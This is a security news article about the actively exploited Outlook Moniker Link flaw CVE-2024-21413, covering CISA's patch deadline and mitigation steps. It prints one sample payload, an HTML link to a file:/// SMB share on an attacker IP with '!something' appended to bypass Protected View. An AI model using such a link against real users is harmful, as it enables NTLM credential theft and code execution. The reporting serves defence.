Critical RCE Bug in Microsoft Outlook Now Exploited in Attacks

A critical remote code execution (RCE) vulnerability in Microsoft Outlook is now being actively exploited in the wild, prompting urgent warnings from cybersecurity authorities, including the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

A Looming Threat to Organizations

CISA has directed U.S. federal agencies to secure their systems against ongoing cyberattacks targeting this vulnerability, tracked as CVE-2024–21413. The flaw was originally discovered by Check Point vulnerability researcher Haifei Li and is a result of improper input validation when processing emails containing malicious links.

The exploit allows attackers to bypass Protected View, a security feature meant to prevent potentially harmful Office documents from executing malicious code. By circumventing this safeguard, attackers can launch their payloads without requiring any user interaction beyond simply previewing an email.

How the Exploit Works

Microsoft patched CVE-2024–21413 a year ago, warning that the Preview Pane itself could serve as an attack vector. This means that even opening a malicious email in Outlook could trigger the exploit, making it particularly dangerous.

According to Check Point, attackers exploit the vulnerability using Moniker Links, a technique that tricks Outlook into opening unsafe files. The exploit leverages the file:// protocol, allowing attackers to embed malicious links that bypass Outlook’s built-in security protections.

By appending an exclamation mark followed by arbitrary text to a file URL, attackers can force Outlook to treat the malicious file as a trusted resource. For example, an attacker might craft a link like this:

<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>

When a victim clicks on the link, Outlook fetches the file from an attacker-controlled server and executes it with elevated privileges.

Affected Microsoft Products

The vulnerability affects multiple Microsoft Office products, including:

• Microsoft Office LTSC 2021
• Microsoft 365 Apps for Enterprise
• Microsoft Outlook 2016
• Microsoft Office 2019

Successful exploitation can lead to:

• Theft of NTLM credentials
• Remote code execution
• Potential full system compromise
• Active Exploitation and Urgent Mitigation Steps

On February 6, 2025, CISA added CVE-2024–21413 to its Known Exploited Vulnerabilities (KEV) catalog, marking it as an actively exploited vulnerability. In compliance with Binding Operational Directive (BOD) 22–01, federal agencies have been given a three-week deadline — until February 27 — to patch their systems and mitigate the risk.

CISA emphasized the urgency of the situation, warning that such vulnerabilities are a frequent attack vector for nation-state actors and cybercriminal groups, posing a significant risk to government and private-sector organizations alike.

What Should Organizations Do?

While the mandate primarily applies to federal agencies, private businesses are strongly advised to prioritize patching to prevent compromise. Organizations should take the following immediate actions:

Apply Microsoft’s Security Patch — Ensure all Microsoft Office products are updated to the latest version.

Disable NTLM Authentication Where Possible — Reducing reliance on NTLM authentication can help mitigate credential theft.

Monitor Network Traffic for Anomalies — Keep an eye out for unusual outbound connections to unknown file shares.

Educate Employees — Train staff on the dangers of clicking unknown links or opening unexpected attachments.

Enable Advanced Threat Protection (ATP) — Microsoft Defender and other security solutions can provide an extra layer of protection.

A Wake-Up Call for Cybersecurity

This attack highlights the ongoing cat-and-mouse game between cyber defenders and malicious actors. Even after a vulnerability has been patched, the risk of exploitation remains high if organizations fail to apply updates promptly. The fact that attackers can leverage something as seemingly harmless as a preview pane in Outlook underscores the need for a proactive cybersecurity strategy.

With federal agencies now rushing to comply with CISA’s directive, organizations worldwide should follow suit and secure their networks before attackers can strike. The urgency of this threat cannot be overstated delayed action could mean the difference between a secure system and a devastating breach.

For organizations still using unpatched versions of Outlook and Microsoft Office, the time to act is now.